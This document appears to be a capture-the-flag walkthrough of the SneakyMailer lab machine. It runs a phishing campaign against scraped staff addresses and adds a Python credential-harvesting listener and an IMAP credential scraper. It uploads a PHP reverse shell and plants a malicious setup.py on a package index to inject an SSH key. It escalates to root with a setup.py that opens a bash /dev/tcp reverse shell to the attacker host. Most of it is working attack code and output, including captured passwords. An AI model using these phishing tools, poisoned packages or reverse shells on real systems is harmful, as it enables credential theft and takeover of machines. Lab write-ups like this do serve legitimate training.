Hack-The-Box-walkthrough[SneakyMailer]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 11 Jul 2020
IP: 10.10.10.197

User Blood: InfoSecJack, 00 days, 03 hours, 45 mins, 53 seconds.
Root Blood: InfoSecJack, 00 days, 03 hours, 48 mins, 41 seconds.

information gathering

First, nmap as usual: all ports, service versions and default scripts.

root@kali:~# nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Employee - Dashboard
143/tcp open imap Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after: 2021-05-14T17:14:21
| MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after: 2021-05-14T17:14:21
| MD5: 3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
| http-methods:
|_ Supported Methods: HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Visiting http://10.10.10.197 redirects to http://sneakycorp.htb/, so the site is selected by the Host header. Two other things worth noting from the scan: Postfix advertises VRFY, which can confirm the addresses collected later before mailing them, and port 8080 only shows the nginx default page, which usually means another name-based vhost is hiding behind it.

Add it to /etc/hosts:

10.10.10.197    sneakycorp.htb

Brute-force virtual hosts with ffuf through the Host header, filtering out the 185-byte response the server returns for unknown names:

root@kali:~/hackthebox/machine/SneakyMailer# ./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185


v1.1.0-git
________________________________________________

:: Method : GET
:: URL : http://sneakycorp.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.sneakycorp.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: 185
________________________________________________

dev [Status: 200, Size: 13737, Words: 4007, Lines: 341]

Add dev.sneakycorp.htb to /etc/hosts as well:

10.10.10.197       sneakycorp.htb  dev.sneakycorp.htb

http://sneakycorp.htb/team.php lists the whole staff with their e-mail addresses; extract them into mails.txt. The box is named SneakyMailer and port 25 accepts mail, so the obvious next step is to mail every address with a link and see who follows it.

Start a listener on port 80 to catch anyone who follows the link in the mail:

root@kali:~# nc -lvp 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80

Send each address a mail with swaks, pointing the body at the listener:

while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt

The address list scraped from team.php (mails.txt):

root@kali:~/hackthebox/machine/SneakyMailer# cat mails.txt
airisatou@sneakymailer.htb
angelicaramos@sneakymailer.htb
ashtoncox@sneakymailer.htb
bradleygreer@sneakymailer.htb
brendenwagner@sneakymailer.htb
briellewilliamson@sneakymailer.htb
brunonash@sneakymailer.htb
caesarvance@sneakymailer.htb
carastevens@sneakymailer.htb
cedrickelly@sneakymailer.htb
chardemarshall@sneakymailer.htb
colleenhurst@sneakymailer.htb
dairios@sneakymailer.htb
donnasnider@sneakymailer.htb
doriswilder@sneakymailer.htb
finncamacho@sneakymailer.htb
fionagreen@sneakymailer.htb
garrettwinters@sneakymailer.htb
gavincortez@sneakymailer.htb
gavinjoyce@sneakymailer.htb
glorialittle@sneakymailer.htb
haleykennedy@sneakymailer.htb
hermionebutler@sneakymailer.htb
herrodchandler@sneakymailer.htb
hopefuentes@sneakymailer.htb
howardhatfield@sneakymailer.htb
jacksonbradshaw@sneakymailer.htb
jenagaines@sneakymailer.htb
jenettecaldwell@sneakymailer.htb
jenniferacosta@sneakymailer.htb
jenniferchang@sneakymailer.htb
jonasalexander@sneakymailer.htb
laelgreer@sneakymailer.htb
martenamccray@sneakymailer.htb
michaelsilva@sneakymailer.htb
michellehouse@sneakymailer.htb
olivialiang@sneakymailer.htb
paulbyrd@sneakymailer.htb
prescottbartlett@sneakymailer.htb
quinnflynn@sneakymailer.htb
rhonadavidson@sneakymailer.htb
sakurayamamoto@sneakymailer.htb
sergebaldwin@sneakymailer.htb
shaddecker@sneakymailer.htb
shouitou@sneakymailer.htb
sonyafrost@sneakymailer.htb
sukiburks@sneakymailer.htb
sulcud@sneakymailer.htb
tatyanafitzpatrick@sneakymailer.htb
thorwalton@sneakymailer.htb
tigernixon@sneakymailer.htb
timothymooney@sneakymailer.htb
unitybutler@sneakymailer.htb
vivianharrell@sneakymailer.htb
yuriberry@sneakymailer.htb
zenaidafrank@sneakymailer.htb

After a short wait one recipient's client follows the link and POSTs a login form to the listener:

root@kali:~# nc -lvp 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:57330.
POST / HTTP/1.1
Host: 10.10.14.4
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

URL-decoding the body gives:

firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

So we have:

mail: paulbyrd@sneakymailer.htb
user: paulbyrd
password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
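
As an added example (not part of the original walkthrough), here is a small Python listener that does the same job as nc plus manual decoding: it accepts any POST, URL-decodes the form with urllib.parse, picks out the identity and secret fields, and answers 200 so the victim's script sees nothing odd. The listening address 0.0.0.0:80 and the extra field names (username, passwd, ...) are assumptions; the captured body embedded as sample input is the one shown above.

```python
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Sample input: the form body the box POSTed back to the listener above.
CAPTURED_BODY = (
    "firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb"
    "&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
    "&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt"
)

# Field names to treat as identity / secret. Only email and password appear on
# this box; the others are an assumption about other phishing targets.
IDENTITY_FIELDS = ("email", "username", "user")
SECRET_FIELDS = ("password", "passwd", "pass")


def parse_form_body(raw: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict.

    parse_qs does the percent-decoding (%5E -> ^, %25 -> %) and, with
    keep_blank_values, keeps fields a victim left empty.
    """
    parsed = urllib.parse.parse_qs(raw, keep_blank_values=True)
    return {key: values[0] for key, values in parsed.items()}


def extract_credentials(form: dict):
    """Return (identity, secret) from a decoded form, or None if it holds no secret."""
    identity = next((form[k] for k in IDENTITY_FIELDS if k in form), None)
    secret = next((form[k] for k in SECRET_FIELDS if k in form), None)
    if secret is None:
        return None
    return identity, secret


class Harvester(BaseHTTPRequestHandler):
    """Accept any POST, decode it, log the credentials, and answer 200."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        form = parse_form_body(body)
        print(f"[{self.client_address[0]}] {self.headers.get('User-Agent')} form={form}")
        creds = extract_credentials(form)
        if creds:
            print(f"[+] captured {creds[0]!r} : {creds[1]!r}")
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # Answer GETs quietly too, so a client that fetches first does not error out.
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    # Assumption: run as root on the attacker host so port 80 can be bound.
    HTTPServer(("0.0.0.0", 80), Harvester).serve_forever()
```

Run it instead of `nc -lvp 80` before the swaks loop; the decoded credentials are printed as they arrive, which matters when more than one recipient answers.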

Install a mail client such as Evolution:

apt-get install evolution

Add an account for paulbyrd@sneakymailer.htb with that password, receiving over IMAP from 10.10.10.197 (port 143, or 993 for IMAPS; the certificate is self-signed) and sending via SMTP on the same host. The Sent folder is what matters here, and reading it needs IMAP, not SMTP.

Two sent messages stand out:

  • mail 1:

From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: low@debian
Subject: Module testing
Date: Wed, 27 May 2020 13:28:58 -0400

Hello low


Your current task is to install, test and then erase every python module you
find in our PyPI service, let me know if you have any inconvenience.

  • mail 2:

From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it
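
Evolution works, but the same data can be pulled with imaplib, which is handier from a jump host with no desktop. The following is an added example, not code from the walkthrough: it logs in over plain IMAP on 143, selects the sent folder, and scans each message body for "Username:" / "...Password:" style lines. The folder name INBOX.Sent (Courier's usual naming), the login name paulbyrd (the full address may be required instead) and the credential-line pattern are assumptions; the embedded sample message is a constructed copy of the second mail above.

```python
import email
import imaplib
import re
from email.message import Message

# Constructed sample: the second Sent message above, as a raw RFC 822 message.
SAMPLE_RAW = b"""From: Paul Byrd <paulbyrd@sneakymailer.htb>
To: root <root@debian>
Subject: Password reset
Date: Fri, 15 May 2020 13:03:37 -0500

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it
"""

# A "Key: value" line at the start of a line whose key mentions a user, login or password.
CRED_LINE = re.compile(
    r"^[ \t]*(?P<key>[A-Za-z-]*(?:user(?:name)?|login|pass(?:word)?)[A-Za-z-]*)"
    r"[ \t]*:[ \t]*(?P<val>\S.*?)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)


def extract_credentials(text: str) -> dict:
    """Collect credential-looking 'Key: value' lines from a message body."""
    return {m.group("key"): m.group("val") for m in CRED_LINE.finditer(text)}


def body_text(msg: Message) -> str:
    """Decoded text/plain content of a parsed message (all plain parts, joined)."""
    parts = [p for p in msg.walk() if p.get_content_type() == "text/plain"]
    return "\n".join(
        p.get_payload(decode=True).decode(p.get_content_charset() or "utf-8", "replace")
        for p in parts
    )


def credentials_from_raw(raw: bytes) -> dict:
    """Parse a raw message and pull credentials out of its body."""
    return extract_credentials(body_text(email.message_from_bytes(raw)))


def sent_credentials(host: str, user: str, password: str, folder: str = "INBOX.Sent") -> dict:
    """Log in over plain IMAP, walk `folder`, and map subject -> credentials found.

    INBOX.Sent is an assumption (Courier-style naming); on a NO response the
    server's folder list is included in the error so the right name can be picked.
    """
    found = {}
    with imaplib.IMAP4(host) as imap:
        imap.login(user, password)
        status, _ = imap.select(folder, readonly=True)
        if status != "OK":
            raise RuntimeError(f"cannot select {folder}; folders: {imap.list()[1]}")
        _, ids = imap.search(None, "ALL")
        for num in ids[0].split():
            _, data = imap.fetch(num, "(RFC822)")
            msg = email.message_from_bytes(data[0][1])
            creds = extract_credentials(body_text(msg))
            if creds:
                found[msg.get("Subject", "")] = creds
    return found


if __name__ == "__main__":
    # Assumption: login name is the local part; use the full address if the server rejects it.
    for subject, creds in sent_credentials(
        "10.10.10.197", "paulbyrd", "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht"
    ).items():
        print(subject, creds)
```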

Getting a shell

The developer password from the second mail works on FTP:

root@kali:~/hackthebox/machine/SneakyMailer# ftp 10.10.10.197
Connected to 10.10.10.197.
220 (vsFTPd 3.0.3)
Name (10.10.10.197:root): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x 8 0 1001 4096 Jul 12 02:47 dev
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 May 26 19:52 css
drwxr-xr-x 2 0 0 4096 May 26 19:52 img
-rwxr-xr-x 1 0 0 13742 Jun 23 09:44 index.php
drwxr-xr-x 3 0 0 4096 May 26 19:52 js
drwxr-xr-x 2 0 0 4096 May 26 19:52 pypi
drwxr-xr-x 4 0 0 4096 May 26 19:52 scss
-rwxr-xr-x 1 0 0 26523 May 26 20:58 team.php
drwxr-xr-x 8 0 0 4096 May 26 19:52 vendor
226 Directory send OK.

The dev directory is the document root of dev.sneakycorp.htb (the listing matches the site: index.php, team.php, css, js) and it is group-writable for gid 1001, developer's group. Upload a PHP reverse shell (shell.php, calling back to 10.10.14.4:1234) into it:

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5492 bytes sent in 0.00 secs (59.5179 MB/s)

With a listener on port 1234 running, request the uploaded file:

http://dev.sneakycorp.htb/shell.php

The listener gets the callback as www-data; spawn a pty and switch to developer with the password from the mail:

root@kali:~# nc -lvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.197.
Ncat: Connection from 10.10.10.197:59722.
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
05:37:19 up 4:05, 0 users, load average: 0.00, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@sneakymailer:/$ su developer
su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

developer@sneakymailer:/$ id
id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
developer@sneakymailer:/$ whoami
whoami
developer

With a developer shell, look around /var/www:

developer@sneakymailer:/var/www$ ls
ls
dev.sneakycorp.htb html pypi.sneakycorp.htb sneakycorp.htb

There is a third vhost, pypi.sneakycorp.htb; add it to /etc/hosts as well:

10.10.10.197    sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb

It is served by the nginx on port 8080:

http://pypi.sneakycorp.htb:8080/

The page is pypiserver's default index:

Welcome to pypiserver!

This is a PyPI compatible package index serving 0 packages.

To use this server with pip, run the following command:

pip install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]


To use this server with easy_install, run the following command:

easy_install --index-url http://pypi.sneakycorp.htb/simple/ PACKAGE [PACKAGE2...]


The complete list of all packages can be found here or via the simple index.

This instance is running version 1.3.2 of the pypiserver software.

pypiserver keeps no user database of its own; the upload credential is an Apache-style .htpasswd in its web folder, and it is readable by developer:

developer@sneakymailer:/var/www$ cat /var/www/pypi.sneakycorp.htb/.htpasswd
cat /var/www/pypi.sneakycorp.htb/.htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat mode 1600 (Apache $apr1$ MD5) with rockyou cracks it in a few seconds:

hash type:   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)            | HTTP, SMTP, LDAP Server

D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 1600 password.txt rockyou.txt

$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Time.Started.....: Sun Jul 12 17:54:53 2020 (3 secs)
Time.Estimated...: Sun Jul 12 17:54:56 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1306.8 kH/s (12.93ms) @ Accel:256 Loops:250 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3670016/14344360 (25.59%)
Rejected.........: 0/3670016 (0.00%)
Restore.Point....: 3538944/14344360 (24.67%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:750-1000
Candidates.#1....: stefy.emin -> sn7594
Hardware.Mon.#1..: N/A

Started: Sun Jul 12 17:54:46 2020
Stopped: Sun Jul 12 17:54:58 2020

The password is:

soufianeelhaoui
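
hashcat is the right tool, but it helps to know what mode 1600 is actually computing. The block below is an added example, not from the walkthrough: a from-scratch md5apr1 (Apache's md5crypt variant with the $apr1$ magic and 1000 rounds), a constant-time verifier, and a tiny dictionary run over the .htpasswd line from the box. The six-word wordlist is constructed; in practice you feed rockyou as above.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"

# From the box: the pypiserver .htpasswd line, plus a constructed mini-wordlist.
HTPASSWD_LINE = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"
WORDLIST = ["123456", "password", "pypi", "sneakymailer", "soufianeelhaoui", "letmein"]


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: six bits at a time, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_hash(password: str, salt: str) -> str:
    """Apache md5apr1 ($apr1$): md5crypt with the '$apr1$' magic and 1000 rounds."""
    pw = password.encode()
    salt_b = salt.encode()[:8]            # at most 8 salt characters are used
    ctx = hashlib.md5(pw + MAGIC + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:                  # mix in len(pw) bytes of md5(pw+salt+pw)
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                            # one byte per bit of len(pw): NUL or pw[0]
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                 # stretching loop; this is what makes it slow-ish
        c = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final                             # bytes are interleaved into 22 output characters
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt_b.decode()}${encoded}"


def apr1_verify(password: str, stored: str) -> bool:
    """Check a password against a '$apr1$salt$hash' string in constant time."""
    try:
        _, tag, salt, _digest = stored.split("$")
    except ValueError:
        return False
    if tag != "apr1":
        return False
    return hmac.compare_digest(apr1_hash(password, salt), stored)


def crack_htpasswd_line(line: str, candidates):
    """Return (user, password) for the first candidate that matches, else None."""
    user, stored = line.strip().split(":", 1)
    for candidate in candidates:
        if apr1_verify(candidate, stored):
            return user, candidate
    return None


if __name__ == "__main__":
    print(crack_htpasswd_line(HTPASSWD_LINE, WORDLIST))
```

The 1000-round loop is why hashcat reports ~1.3 MH/s here rather than the hundreds of MH/s plain MD5 would give; it is still far too cheap for a password that sits in rockyou.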

With the pypi credential we can upload packages, and the first mail said that low installs and tests every package on this index. setup.py is plain Python that runs at install time, so a package whose setup.py appends our SSH public key to /home/low/.ssh/authorized_keys turns that routine into an SSH login as low.

First create a working directory on the box:

cd /tmp
mkdir mypkg

Create a .pypirc that tells distutils where the local index is and how to authenticate:

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

Pull it onto the box with scp from the attacker host (the .ssh warnings are harmless: developer's HOME is /var/www/dev.sneakycorp.htb and is not writable by that user):

developer@sneakymailer:/tmp/mypkg$ scp root@10.10.14.4:/root/hackthebox/machine/SneakyMailer/.pypirc .
<4.4:/root/hackthebox/machine/SneakyMailer/.pypirc .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.14.4 (10.10.14.4)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.14.4's password: 2525

.pypirc 100% 128 0.4KB/s 00:00

Restrict the file to its owner:

developer@sneakymailer:/tmp/mypkg$ chmod 600 .pypirc
chmod 600 .pypirc
developer@sneakymailer:/tmp/mypkg$ ls -la
ls -la
total 12
drwxrwxrwx 2 developer developer 4096 Jul 12 07:09 .
drwxrwxrwt 10 root root 4096 Jul 12 07:09 ..
-rw------- 1 developer developer 128 Jul 12 07:09 .pypirc

On the attacker host, generate an SSH key pair; the public key is what the package will append to low's authorized_keys (-b is ignored for ed25519, whose key size is fixed):

root@kali:~/hackthebox/machine/SneakyMailer# ssh-keygen -b 2048 -t ed25519 -f ./key -q -N ""
root@kali:~/hackthebox/machine/SneakyMailer# ls
ffuf key key.pub mails.txt shell.php
root@kali:~/hackthebox/machine/SneakyMailer# cat key.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMM20bpCOUwHR4+8hMegW7FanYYPdA6yJZ1OIniwUDXn root@kali

Create setup.py. The file write sits at module level, so it executes as soon as pip imports the file, before setup() is even called, as whichever user runs the install:

import setuptools

# Runs at module level: pip executes this the moment it imports setup.py,
# before setup() is called, as the user performing the install.
try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMM20bpCOUwHR4+8hMegW7FanYYPdA6yJZ1OIniwUDXn root@kali")
except Exception:
    # Swallow errors so the package still builds and uploads cleanly on our side.
    pass

setuptools.setup(
    name="example-pkg3",
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
)

Copy it over the same way:

developer@sneakymailer:/tmp/mypkg$ scp root@10.10.14.4:/root/hackthebox/machine/SneakyMailer/setup.py .
<.4:/root/hackthebox/machine/SneakyMailer/setup.py .
Could not create directory '/var/www/dev.sneakycorp.htb/.ssh'.
The authenticity of host '10.10.14.4 (10.10.14.4)' can't be established.
ECDSA key fingerprint is SHA256:TA8zjlhAspZEc/3WZjyWRQBxzPfwJXE2X98JsMGnz6U.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/dev.sneakycorp.htb/.ssh/known_hosts).
root@10.10.14.4's password: 2525

setup.py 100% 720 0.7KB/s 00:00

distutils reads .pypirc from $HOME, so point HOME at the package directory (HOME is already exported, so the reassignment is inherited by python3), then build the sdist and register and upload it to the local index:

developer@sneakymailer:/tmp/mypkg$ chmod 777 setup.py
chmod 777 setup.py
developer@sneakymailer:/tmp/mypkg$ HOME=$(pwd)
HOME=$(pwd)
developer@sneakymailer:~$ python3 setup.py sdist register -r local upload -r local
<n3 setup.py sdist register -r local upload -r local
running sdist
running egg_info
creating example_pkg3.egg-info
writing example_pkg3.egg-info/PKG-INFO
writing dependency_links to example_pkg3.egg-info/dependency_links.txt
writing top-level names to example_pkg3.egg-info/top_level.txt
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
reading manifest file 'example_pkg3.egg-info/SOURCES.txt'
writing manifest file 'example_pkg3.egg-info/SOURCES.txt'
warning: sdist: standard file not found: should have one of README, README.rst, README.txt, README.md

running check
creating example-pkg3-0.0.1
creating example-pkg3-0.0.1/example_pkg3.egg-info
copying files to example-pkg3-0.0.1...
copying setup.py -> example-pkg3-0.0.1
copying example_pkg3.egg-info/PKG-INFO -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/SOURCES.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/dependency_links.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
copying example_pkg3.egg-info/top_level.txt -> example-pkg3-0.0.1/example_pkg3.egg-info
Writing example-pkg3-0.0.1/setup.cfg
creating dist
Creating tar archive
removing 'example-pkg3-0.0.1' (and everything under it)
running register
Registering example-pkg3 to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Registering is deprecated, use twine to upload instead (https://pypi.org/p/twine/)
running upload
Submitting dist/example-pkg3-0.0.1.tar.gz to http://pypi.sneakycorp.htb:8080
Server response (200): OK
WARNING: Uploading via this command is deprecated, use twine to upload instead (https://pypi.org/p/twine/)

Once low's job installs the package, the key is in authorized_keys and SSH works:

root@kali:~/hackthebox/machine/SneakyMailer# chmod 700 key
root@kali:~/hackthebox/machine/SneakyMailer# ssh -i key low@10.10.10.197
Linux sneakymailer 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Tue Jun 9 03:02:52 2020 from 192.168.56.105
low@sneakymailer:~$ id
uid=1000(low) gid=1000(low) groups=1000(low),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),119(pypi-pkg)
low@sneakymailer:~$ whoami
low

user.txt:

low@sneakymailer:~$ ls
user.txt venv
low@sneakymailer:~$ cat user.txt
92d8adff6a2d3da02673a9fb6aa471a4

Privilege escalation

Check sudo rights:

low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
(root) NOPASSWD: /usr/bin/pip3

low can run pip3 as root without a password. pip install of a local directory executes that directory's setup.py as root, so a package whose install command spawns a reverse shell is enough (this is the fakepip technique by zc00l, see the url in the script). cd to /dev/shm and save the following as setup.py:

from setuptools import setup
from setuptools.command.install import install
import os


class CustomInstall(install):
    """Install command that runs the normal install, then calls back to us."""

    def run(self):
        install.run(self)
        # Executed by whoever runs `pip3 install`: here root, via sudo.
        os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9002 0>&1'")


setup(
    name='FakePip',
    version='0.0.1',
    description='This will exploit a sudoer able to /usr/bin/pip install *',
    url='https://github.com/0x00-0x00/fakepip',
    author='zc00l',
    author_email='andre.marques@esecurity.com.br',
    license='MIT',
    zip_safe=False,
    cmdclass={'install': CustomInstall},
)

Start a listener on port 9002, then install the current directory as root:

low@sneakymailer:/dev/shm$ sudo /usr/bin/pip3 install . --upgrade --force-reinstall
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Processing /dev/shm
Building wheels for collected packages: FakePip
Running setup.py bdist_wheel for FakePip ... -

pip hangs at the wheel-build spinner because the reverse shell is holding the process open; meanwhile the listener on 9002 has a root shell:

root@kali:~# nc -lvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.197.
